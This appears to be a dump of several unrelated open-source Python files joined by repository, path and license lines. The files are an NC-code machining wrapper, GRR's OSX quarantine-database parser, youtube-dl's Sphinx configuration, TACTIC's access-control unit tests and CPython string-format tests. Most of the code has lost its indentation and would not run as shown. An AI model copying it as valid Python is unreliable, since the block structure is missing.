def bore(x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, feed_in=None, feed_out=None, stoppos=None, shift_back=None, shift_right=None, backbore=False, stop=False):
    creator.bore(x, y, z, zretract, depth, standoff, dwell_bottom, feed_in, feed_out, stoppos, shift_back, shift_right, backbore, stop)
def end_canned_cycle():
creator.end_canned_cycle()
def peck(count, first, last=None, step=0.0):
pecks = []
peck = first
if (last == None) : last = first
for i in range(0,count):
pecks.append(peck)
if (peck - step > last) : peck -= step
return pecks
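# Example: peck(4, 3.0, last=1.0, step=0.75) returns [3.0, 2.25, 1.5, 1.5];
# each peck shrinks by 'step' per pass but is never reduced below 'last'.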
############################################################################
## Misc
def comment(text):
creator.comment(text)
def insert(text):
creator.insert(text)
def block_delete(on=False):
creator.block_delete(on)
def variable(id):
creator.variable(id)
def variable_set(id, value):
creator.variable_set(id, value)
def probe_single_point(point_along_edge_x=None, point_along_edge_y=None, depth=None, retracted_point_x=None, retracted_point_y=None, destination_point_x=None, destination_point_y=None, intersection_variable_x=None, intersection_variable_y=None, probe_offset_x_component=None, probe_offset_y_component=None ):
creator.probe_single_point(point_along_edge_x, point_along_edge_y, depth, retracted_point_x, retracted_point_y, destination_point_x, destination_point_y, intersection_variable_x, intersection_variable_y, probe_offset_x_component, probe_offset_y_component )
def probe_downward_point(x=None, y=None, depth=None, intersection_variable_z=None):
creator.probe_downward_point(x, y, depth, intersection_variable_z)
def report_probe_results(x1=None, y1=None, z1=None, x2=None, y2=None, z2=None, x3=None, y3=None, z3=None, x4=None, y4=None, z4=None, x5=None, y5=None, z5=None, x6=None, y6=None, z6=None, xml_file_name=None ):
creator.report_probe_results(x1, y1, z1, x2, y2, z2, x3, y3, z3, x4, y4, z4, x5, y5, z5, x6, y6, z6, xml_file_name)
def open_log_file(xml_file_name=None ):
creator.open_log_file(xml_file_name)
def log_coordinate(x=None, y=None, z=None):
creator.log_coordinate(x, y, z)
def log_message(message=None):
creator.log_message(message)
def close_log_file():
creator.close_log_file()
def rapid_to_midpoint(x1=None, y1=None, z1=None, x2=None, y2=None, z2=None):
creator.rapid_to_midpoint(x1, y1, z1, x2, y2, z2)
def rapid_to_intersection(x1, y1, x2, y2, x3, y3, x4, y4, intersection_x, intersection_y, ua_numerator, ua_denominator, ua, ub_numerator, ub):
creator.rapid_to_intersection(x1, y1, x2, y2, x3, y3, x4, y4, intersection_x, intersection_y, ua_numerator, ua_denominator, ua, ub_numerator, ub)
def rapid_to_rotated_coordinate(x1, y1, x2, y2, ref_x, ref_y, x_current, y_current, x_final, y_final):
creator.rapid_to_rotated_coordinate(x1, y1, x2, y2, ref_x, ref_y, x_current, y_current, x_final, y_final)
def set_path_control_mode(mode, motion_blending_tolerance, naive_cam_tolerance ):
creator.set_path_control_mode(mode, motion_blending_tolerance, naive_cam_tolerance )
############################################################################
## NC code creator for additive machines like RepRap
def wipe():
creator.wipe()
def extruder_on():
creator.extruder_on()
def extruder_off():
creator.extruder_off()
def set_extruder_flowrate(flowrate):
creator.set_extruder_flowrate(flowrate)
def extruder_temp(temp=None):
creator.extruder_temp(temp)
def fan_on():
creator.fan_on()
def fan_off():
creator.fan_off()
def build_bed_temp(temp=None):
creator.build_bed_temp(temp)
def chamber_temp(temp=None):
creator.chamber_temp(temp)
| mit |
MiniSEC/GRR_clone | parsers/osx_quarantine.py | 6 | 2638 | #!/usr/bin/env python
#
# Copyright 2012 Google Inc. All Rights Reserved.
"""Parser for OSX quarantine sqlite files."""
__program__ = "osx_quarantine.py"
import datetime
import glob
import locale
import sys
from grr.parsers import sqlite_file
class OSXQuarantineEvents(sqlite_file.SQLiteFile):
"""Class for handling the parsing of a OSX quarantine events.
Use as:
c = OSXQuarantineEvents(open('com.apple.LaunchServices.QuarantineEvents'))
for event in c.Parse():
print event
"""
# OSX Timestamp is seconds since January 1st 2001.
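  # 978328800 seconds separate the Unix epoch (1970-01-01) from the OSX/Cocoa
  # epoch (2001-01-01); multiplying by 1e6 converts seconds to microseconds.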
EVENTS_QUERY = ("select (LSQuarantineTimeStamp+978328800)*1e6,"
"LSQuarantineAgentBundleIdentifier, LSQuarantineAgentName,"
"LSQuarantineDataURLString, LSQuarantineSenderName,"
"LSQuarantineSenderAddress, LSQuarantineTypeNumber,"
"LSQuarantineOriginTitle, LSQuarantineOriginURLString,"
"LSQuarantineOriginAlias "
"from LSQuarantineEvent "
"ORDER BY LSQuarantineTimeStamp"
)
def Parse(self):
"""Iterator returning dict for each entry in history."""
for data in self.Query(self.EVENTS_QUERY):
(timestamp, agent_bundle_identifier, agent_name, url, sender,
sender_address, type_number, title, referrer, referrer_alias) = data
yield [timestamp, "OSX_QUARANTINE", url, referrer, title, agent_name,
agent_bundle_identifier, sender, sender_address, type_number,
referrer_alias]
def main(argv):
if len(argv) < 2:
print "Usage: %s com.apple.LaunchServices.QuarantineEvents" % __program__
sys.exit(1)
encoding = locale.getpreferredencoding()
if encoding.upper() != "UTF-8":
print "%s requires an UTF-8 capable console/terminal" % __program__
sys.exit(1)
files_to_process = []
for input_glob in argv[1:]:
files_to_process += glob.glob(input_glob)
for input_file in files_to_process:
events = OSXQuarantineEvents(open(input_file))
for data in events.Parse():
timestamp, entry_type, url, data1, data2, data3, _, _, _, _, _ = data
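      # 'timestamp' is in microseconds since the Unix epoch; the shift from
      # the OSX epoch already happened in EVENTS_QUERY above.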
try:
date_string = datetime.datetime(1970, 1, 1)
date_string += datetime.timedelta(microseconds=timestamp)
date_string = u"%s+00:00" % (date_string)
except TypeError:
date_string = timestamp
except ValueError:
date_string = timestamp
output_string = u"%s\t%s\t%s\t%s\t%s\t%s" % (
date_string, entry_type, url, data1, data2, data3)
print output_string.encode("UTF-8")
if __name__ == "__main__":
main(sys.argv)
| apache-2.0 |
rbrito/pkg-youtube-dl | docs/conf.py | 39 | 2276 | # coding: utf-8
#
# youtube-dl documentation build configuration file, created by
# sphinx-quickstart on Fri Mar 14 21:05:43 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# Allows to import youtube_dl
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'youtube-dl'
copyright = u'2014, Ricardo Garcia Gonzalez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from youtube_dl.version import __version__
version = __version__
# The full version, including alpha/beta/rc tags.
release = version
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'youtube-dldoc'
| unlicense |
Southpaw-TACTIC/TACTIC | src/pyasm/security/security_test.py | 1 | 30165 | #!/usr/bin/env python
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ["SecurityTest"]
import tacticenv
from pyasm.common import Environment, SecurityException, Xml, Config
from pyasm.search import *
from pyasm.unittest import *
from pyasm.biz import Project, ExpressionParser
from pyasm.security import Login
from .security import *
from .drupal_password_hasher import DrupalPasswordHasher
from .access_manager import *
from .batch import *
from .crypto_key import *
import unittest
class SecurityTest(unittest.TestCase):
def _setup(self):
        # initialize the framework as a batch process
Site.set_site('default')
security = Environment.get_security()
from pyasm.biz import Project
Project.set_project("unittest")
self.security = Environment.get_security()
self.user = 'unittest_guy'
self.password = 'cow'
self.encrypted = Login.encrypt_password(self.password)
self.person = None
# start a transaction
self.transaction = Transaction.get(create=True)
#self.transaction.start()
        # If portal is enabled
portal_enabled = Config.get_value("portal", "enabled") == "true"
if portal_enabled:
try:
site = Site.set_site("default")
# create the user
login = SObjectFactory.create("portal/client")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.commit()
finally:
Site.pop_site()
# create the user
login = SObjectFactory.create("sthpw/login")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
s = Search('sthpw/login_group')
s.add_filter('login_group','user')
group = s.get_sobject()
if not group:
group = SObjectFactory.create("sthpw/login_group")
group.set_value("login_group", 'user')
group.set_value('access_level','min')
group.commit()
s = Search('sthpw/login_in_group')
s.add_filter('login',self.user)
s.add_filter('login_group', 'user')
lng = s.get_sobject()
if lng:
lng.delete()
# create the user2
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_gal')
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
# create the user3 and add to a group
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_dan')
login.set_value("password", self.encrypted)
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'unittest_med')
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'test')
login.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", 'unittest_dan')
l_in_g.set_value("login_group", 'unittest_med')
l_in_g.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", self.user)
l_in_g.set_value("login_group", 'test')
l_in_g.commit()
def _tear_down(self):
#self.transaction = Transaction.get()
self.transaction.rollback()
        # this is necessary because set_value() was possibly caught in a security exception; needs investigation
#if self.person:
# self.person.delete()
tasks = Search.eval("@SOBJECT(sthpw/task['project_code','in','unittest|sample3d'])")
for task in tasks:
task.delete(triggers=False)
def test_all(self):
batch = Batch()
Environment.get_security().set_admin(True)
from pyasm.unittest import UnittestEnvironment, Sample3dEnvironment
test_env = UnittestEnvironment()
test_env.create()
sample3d_env = Sample3dEnvironment(project_code='sample3d')
sample3d_env.create()
Project.set_project("unittest")
try:
self.access_manager = Environment.get_security().get_access_manager()
self._test_all()
finally:
# Reset access manager for tear down
Environment.get_security()._access_manager = self.access_manager
Environment.get_security().reset_access_manager()
self._tear_down()
Environment.get_security().set_admin(True)
test_env.delete()
Environment.get_security().set_admin(True)
sample3d_env.delete()
Site.pop_site()
def _test_initial_access_level(self):
        # before any process rules are added, unittest_guy in the 'user' group has the MIN
        # access_level, so he has no access to processes but does have access to search_types
self.security.set_admin(False)
security = Environment.get_security()
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, False)
stype_keys = [{'code':'*'}, {'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, True)
# we don't have this sType specified explicitly, should be False
stype_keys = [{'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, False)
def _test_all(self):
try:
self._setup()
self._test_crypto()
self._test_drupal()
self._test_security_fail()
self._test_security_pass()
self._test_initial_access_level()
self._test_sobject_access_manager()
# order matters here
self._test_search_filter()
self._test_access_level()
self._test_access_manager()
self._test_guest_allow()
except Exception as e:
print("Error: ", e)
raise
def _test_drupal(self):
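        # Drupal 7-style hash layout (an assumption, inferred from the test
        # data below): the '$S$' marker, one iteration-count character ('D'),
        # the 8-character salt ('DPRNKWLY'), then the encoded digest.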
password = "tactic"
salt = "DPRNKWLY"
new = DrupalPasswordHasher().encode(password, salt, 'D')
encoded = "$S$DDPRNKWLY5IwB.aQlCm/OLRrFxZmpa7Rk/kjm/J45bGNGTXUsRxq"
self.assertEqual(new, encoded)
verify = DrupalPasswordHasher().verify("tactic", encoded)
self.assertEqual(True, verify)
def _test_security_fail(self):
# should fail
password = 'test'
fail = False
try:
self.security.login_user(self.user,password)
except SecurityException as e:
fail = True
self.assertEqual( True, fail )
def _test_security_pass(self):
fail = False
try:
self.security.login_user(self.user,self.password)
except SecurityException as e:
fail = True
user = Environment.get_user_name()
# set this user as admin
self.security.set_admin(True)
self.assertEqual('unittest_guy', user)
self.assertEqual( False, fail )
def count(self, it):
from collections import defaultdict
d = defaultdict(int)
for j in it:
d[j] += 1
return d
def _test_search_filter(self):
# NOTE: this unittest is flawed because it relies on project
# that may not exist
self.security.set_admin(False)
# exclude sample3d tasks and include unittest tasks only
rules = """
<rules>
<rule value='sample3d' search_type='sthpw/task' column='project_code' op='!=' group='search_filter'/>
<rule value='unittest' search_type='sthpw/task' column='project_code' group='search_filter'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(False, 'sample3d' in project_codes)
self.assertEqual(True, 'unittest' in project_codes)
# test list-based expression
rules = """
<rules>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value="@GET(sthpw/login['login','EQ','unittest'].login)" search_type='sthpw/task' op='in' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
self.security.set_admin(False)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 3 tasks were created above for a person
self.assertEqual(3, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual({'unittest_guy': 1,'unittest_gal': 1}, self.count(assigned_codes))
self.assertEqual(True, ['unittest'] == project_codes)
rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule group="project" code='art' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
security = Environment.get_security()
security.reset_access_manager()
access_manager = security.get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 2 tasks were created above for unittest_guy
self.assertEqual(2, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['unittest'] == project_codes)
Project.set_project('sample3d')
try:
search = Search('sthpw/task')
tasks = search.get_sobjects()
self.assertEqual(1, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
finally:
Project.set_project('unittest')
# project specific rule
proj_rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='unittest'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
project = Project.get_by_code('sample3d')
if project:
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
# should fail since project is switched to sample3d.. and it should have more than just unittest
self.assertEqual(False, ['unittest'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
# unittest specific rule that uses negation !=, this takes care of NULL value automatically
rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule value='5' search_type='sthpw/task' column='priority' op='!=' group='search_filter' project='sample3d'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
priorities = SObject.get_values(tasks,'priority', unique=True)
#project_codes = SObject.get_values(tasks,'project_code', unique=True)
for p in priorities:
self.assertEqual(True, p != 5)
try:
Project.set_project('unittest')
except SecurityException as e:
# should get an SecurityException
self.assertEqual('User [unittest_guy] is not permitted to view project [unittest]', e.__str__())
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
except Exception as e:
print("Error : %s", str(e))
else:
# this should not happen
raise Exception('unittest_guy should not be allowed to use Project unittest here.')
# One should be able to insert a task that is outside the query restriction of the above rule
task = SearchType.create('sthpw/task')
task.set_sobject_value(self.person)
task.set_value('assigned', 'made_up_login')
task.set_value('project_code', 'sample3d')
task.set_value('description', 'a new task')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
self.assertEqual('made_up_login', task.get_value('assigned'))
# DEPRECATED: column level security has been disabled for now (for
# performance reasons)
def _test_sobject_access_manager(self):
'''test a more realistic example'''
# create a test person
person = Person.create("Donald", "Duck", "DisneyLand", "A duck!!!")
self.person = person
for project_code in ['unittest','unittest','sample3d']:
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_guy')
task.set_value('project_code', project_code)
task.set_value('description', 'do something good')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
# an extra task for list-based search_filter test
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_gal')
task.set_value('project_code', 'unittest')
task.set_value('description', 'do something good')
task.set_value('process', 'unittest2')
task.set_value('context', 'unittest2')
task.commit()
# add these rules to the current user
rules = """
<rules>
<rule group="sobject_column" default="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_first" access="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_last" access="deny"/>
<rule group="sobject_column" search_type="unittest/person" column="nationality" access="deny"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
# disable admin for this test
access_manager.set_admin(False)
# should succeed
person.set_value("name_first", "Donny")
# should fail
try:
person.set_value("name_last", "Ducky")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
# should succeed
name_last = person.get_value("name_last")
self.assertEqual("Duck", name_last)
# should fail
# DISABLED for now since Search._check_value_security() is commented out
"""
try:
nationality = person.get_value("nationality")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
"""
# disable admin for this test
access_manager.set_admin(True)
def _test_access_manager(self):
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule group='sobject' key='corporate/budget' access='allow'/>
<rule group='sobject' key='corporate/salary' access='allow'/>
<rule group='sobject' key='prod/asset' access='edit'/>
<rule group='sobject' search_type='sthpw/note' project='sample3d' access='edit'/>
<group type='url' default='deny'>
<rule key='/tactic/bar/Partner' access='view'/>
<rule key='/tactic/bar/External' access='view'/>
</group>
<rule group='sobject' search_type='prod/layer' project='sample3d' access='view'/>
<rule column='description' search_type='prod/shot' access='view' group='sobject_column'/>
<group type='sobject_column' default='edit'>
<rule key='prod/asset|director_notes' access='deny'/>
<rule key='prod/asset|sensitive_data' access='deny'/>
</group>
<rule group='search_type' code='prod/asset' access='allow'/>
<rule group='search_type' code='sthpw/note' project='unittest' access='edit'/>
<rule group='search_type' code='unittest/person' project='unittest' access='allow'/>
<rule group='builtin' key='view_site_admin' access='allow'/>
<rule group='builtin' key='export_all_csv' project='unittest' access='allow'/>
<rule group='builtin' key='import_csv' access='allow'/>
<rule group='builtin' key='retire_delete' project='*' access='allow'/>
<rule group='builtin' key='view_side_bar' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml)
        # try mixing in a 2nd login_group rule with a project override, mimicking a
        # login_group with a project_code. But the 'project' group is special: it doesn't
        # get the usual project_override treatment
xml2 = Xml()
xml2.read_string('''
<rules>
<rule group="project" code="sample3d" access="allow"/>
<rule group="project" code="unittest" access="allow"/>
<rule group='builtin' key='view_side_bar' project='sample3d' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml2)
access_manager.print_rules('project')
test = access_manager.check_access('builtin', 'view_site_admin','allow')
self.assertEqual(test, True)
Project.set_project('sample3d')
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, False)
# old way of checking project
test = access_manager.check_access('project', 'sample3d','allow')
self.assertEqual(test, True)
Project.set_project('unittest')
# old way should work as well
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, True)
# default to the system's hardcoded deny for builtin
test = access_manager.check_access('builtin', 'export_all_csv','allow', default='deny')
self.assertEqual(test, True)
# this is the new way to control per project csv export
keys = [{'key':'export_all_csv', 'project': 'unittest'}, {'key':'export_all_csv','project': '*'}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
keys = [{'key':'import_csv', 'project': '*'}, {'key':'import_csv','project': Project.get_project_code()}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
test = access_manager.check_access('builtin', 'view_side_bar','allow')
self.assertEqual(test, True)
key = { "project": 'unittest', 'key':'view_side_bar' }
key1 = { "project": 'sample3d', 'key':'view_side_bar' }
key2 = { "project": "*",'key': 'view_side_bar' }
keys = [key, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
keys = [key1, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
test = access_manager.check_access('builtin', 'retire_delete','allow')
self.assertEqual(test, True)
# test sensitive sobject
test = access_manager.get_access('sobject', 'corporate/budget')
self.assertEqual(test, "allow")
# test allowed sobject
test = access_manager.get_access('sobject', 'prod/asset')
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', [{'search_type':'sthpw/note', 'project':'sample3d'}])
self.assertEqual(test, "edit")
# test url
test = access_manager.get_access('url', '/tactic/bar/Partner')
self.assertEqual(test, "view")
# test with access values ... a more typical usage
test = access_manager.check_access('sobject','prod/asset','view')
self.assertEqual(test, True)
test = access_manager.check_access('sobject','corporate/budget','edit')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column', 'prod/asset|director_notes','deny')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'edit')
self.assertEqual(test, False)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'view')
self.assertEqual(test, True)
test = access_manager.get_access('sobject', {'search_type':'sthpw/note', 'project':'sample3d'} )
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', {'search_type':'sthpw/note'} )
self.assertEqual(test, None)
test = access_manager.get_access('sobject', {'search_type':'prod/layer', 'project':'sample3d'} )
self.assertEqual(test, "view")
test = access_manager.get_access('sobject', 'prod/layer' )
self.assertEqual(test, None)
Project.set_project('sample3d')
# security version 2 uses group = search_type
asset = SearchType.create('prod/asset')
asset.set_value('name','unit test obj')
asset.commit(triggers=False)
# replace the access manager with this
Environment.get_security()._access_manager = access_manager
test = access_manager.check_access('search_type',{'search_type':'prod/asset','project':'sample3d'},'delete')
self.assertEqual(test, False)
asset.delete()
note = SearchType.create('sthpw/note')
note.set_value('note','unit test note obj')
note.set_value('project_code','unittest')
note.commit(triggers=False)
test = access_manager.get_access('search_type', [{'code':'sthpw/note', 'project':'unittest'}] )
self.assertEqual(test, 'edit')
msg = ''
# delete of unittest note should fail
try:
note.delete()
except SObjectException as e:
msg = 'delete error'
self.assertEqual(msg, 'delete error')
note = SearchType.create('sthpw/note')
note.set_value('note','unit test sample3d note obj')
note.set_value('project_code','sample3d')
note.commit(triggers=False)
# this should pass since it's a sthpw/ prefix
note.delete()
test = access_manager.check_access('search_type',{'search_type':'sthpw/note','project':'unittest'},'delete')
self.assertEqual(test, False)
self.assertEqual('unittest_guy', Environment.get_user_name())
def _test_crypto(self):
key = CryptoKey()
key.generate()
# test verifying a string
test_string = "Holy Moly"
signature = key.get_signature(test_string)
check = key.verify(test_string, signature)
self.assertEqual(True, check)
# verify an incorrect string
check = key.verify("whatever", signature)
self.assertEqual(False, check)
# encrypt and decrypt a string
test_string = "This is crazy"
coded = key.encrypt(test_string)
# create a new key
private_key = key.get_private_key()
key2 = CryptoKey()
key2.set_private_key(private_key)
test_string2 = key2.decrypt(coded)
self.assertEqual(test_string, test_string2)
def _test_access_level(self):
security = Environment.get_security()
from pyasm.security import get_security_version
security_version = get_security_version()
projects = Search.eval('@SOBJECT(sthpw/project)')
if security_version >= 2:
for project in projects:
key = { "code": project.get_code() }
key2 = { "code": "*" }
keys = [key, key2]
default = "deny"
# other than sample3d, unittest as allowed above, a default low access level user
# should not see other projects
access = security.check_access("project", keys, "allow", default=default)
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, True)
if project.get_code() in ['sample3d','unittest']:
self.assertEqual(access, True)
else:
self.assertEqual(access, False)
else:
raise SecurityException('Please test with security version 2. Set it in your config file')
def _test_guest_allow(self):
'''test Config tag allow_guest in security tag.
        Note: Since it is hard to emulate the AppServer class,
        this is based on the logic handled in _get_display
        of BaseAppServer.
1. If allow_guest is false, then it is necessary that
Sudo is instantiated.
2. If allow_guest is true, then it is necessary that
guest login rules are added and login_as_guest is
executed.
'''
security = Security()
Environment.set_security(security)
#1. allow_guest is false
fail = False
try:
sudo = Sudo()
except Exception as e:
fail = True
self.assertEqual( False, fail )
sudo.exit()
key = [{'code': "*"}]
project_access = security.check_access("project", key, "allow")
self.assertEqual(project_access, False)
#2. allow_guest is true
Site.set_site("default")
try:
security.login_as_guest()
ticket_key = security.get_ticket_key()
access_manager = security.get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule column="login" value="{$LOGIN}" search_type="sthpw/login" access="deny" op="!=" group="search_filter"/>
<rule group="project" code="default" access="allow"/>
</rules>
''')
access_manager.add_xml_rules(xml)
finally:
Site.pop_site()
default_key = [{'code': "default"}]
project_access = security.check_access("project", default_key, "allow")
self.assertEqual(project_access, True)
unittest_key = [{'code', "sample3d"}]
project_access = security.check_access("project", unittest_key, "allow")
self.assertEqual(project_access, False)
if __name__ == "__main__":
unittest.main()
| epl-1.0 |
xbmc/atv2 | xbmc/lib/libPython/Python/Lib/test/test_format.py | 8 | 10198 | from test.test_support import verbose, have_unicode, TestFailed
import sys
# test string formatting operator (I am not sure if this is being tested
# elsewhere but, surely, some of the given cases are *not* tested because
# they crash python)
# test on unicode strings as well
overflowok = 1
def testformat(formatstr, args, output=None):
if verbose:
if output:
print "%s %% %s =? %s ..." %\
(repr(formatstr), repr(args), repr(output)),
else:
print "%s %% %s works? ..." % (repr(formatstr), repr(args)),
try:
result = formatstr % args
except OverflowError:
if not overflowok:
raise
if verbose:
print 'overflow (this is fine)'
else:
if output and result != output:
if verbose:
print 'no'
print "%s %% %s == %s != %s" %\
(repr(formatstr), repr(args), repr(result), repr(output))
else:
if verbose:
print 'yes'
def testboth(formatstr, *args):
testformat(formatstr, *args)
if have_unicode:
testformat(unicode(formatstr), *args)
testboth("%.1d", (1,), "1")
testboth("%.*d", (sys.maxint,1)) # expect overflow
testboth("%.100d", (1,), '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.117x", (1,), '0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.118x", (1,), '0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%f", (1.0,), "1.000000")
# these are trying to test the limits of the internal magic-number-length
# formatting buffer, if that number changes then these tests are less
# effective
testboth("%#.*g", (109, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+100/3.))
# test some ridiculously large precision, expect overflow
testboth('%12.*f', (123456, 1.0))
# Formatting of long integers. Overflow is not ok
overflowok = 0
testboth("%x", 10L, "a")
testboth("%x", 100000000000L, "174876e800")
testboth("%o", 10L, "12")
testboth("%o", 100000000000L, "1351035564000")
testboth("%d", 10L, "10")
testboth("%d", 100000000000L, "100000000000")
big = 123456789012345678901234567890L
testboth("%d", big, "123456789012345678901234567890")
testboth("%d", -big, "-123456789012345678901234567890")
testboth("%5d", -big, "-123456789012345678901234567890")
testboth("%31d", -big, "-123456789012345678901234567890")
testboth("%32d", -big, " -123456789012345678901234567890")
testboth("%-32d", -big, "-123456789012345678901234567890 ")
testboth("%032d", -big, "-0123456789012345678901234567890")
testboth("%-032d", -big, "-123456789012345678901234567890 ")
testboth("%034d", -big, "-000123456789012345678901234567890")
testboth("%034d", big, "0000123456789012345678901234567890")
testboth("%0+34d", big, "+000123456789012345678901234567890")
testboth("%+34d", big, " +123456789012345678901234567890")
